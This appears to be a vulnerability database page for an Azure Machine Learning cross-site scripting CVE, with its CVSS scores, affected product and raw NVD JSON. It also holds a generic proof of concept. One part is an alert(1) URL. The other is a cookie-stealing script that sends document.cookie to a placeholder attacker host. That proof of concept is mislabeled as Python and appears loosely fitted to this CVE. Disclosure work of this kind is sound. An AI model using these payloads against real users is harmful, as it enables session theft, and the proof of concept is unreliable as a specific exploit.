Security Vulnerability Report
中文
CVE-2026-32207 CVSS 8.8 HIGH

CVE-2026-32207

Published: 2026-05-07 22:16:34
Last Modified: 2026-05-08 19:55:25

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:azure_machine_learning:-:*:*:*:*:*:*:* - VULNERABLE
Azure Machine Learning < 2026-05-07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-32207: XSS in Azure Machine Learning --> <!-- The attacker crafts a malicious URL with a payload --> <!-- Example 1: Basic Alert (Confirmation of Vulnerability) --> https://ml.azure.com/vulnerable_endpoint?param=<script>alert(1)</script> <!-- Example 2: Cookie Stealer (Data Exfiltration) --> <!-- Inject the following script to send cookies to attacker server --> <script> var img = new Image(); img.src = "http://attacker-controlled.com/collect?c=" + escape(document.cookie); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32207", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:33.900", "lastModified": "2026-05-08T19:55:25.213", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_machine_learning:-:*:*:*:*:*:*:*", "matchCriteriaId": "19C59E89-7553-4613-A4E6-703B48DBE92C"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32207", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}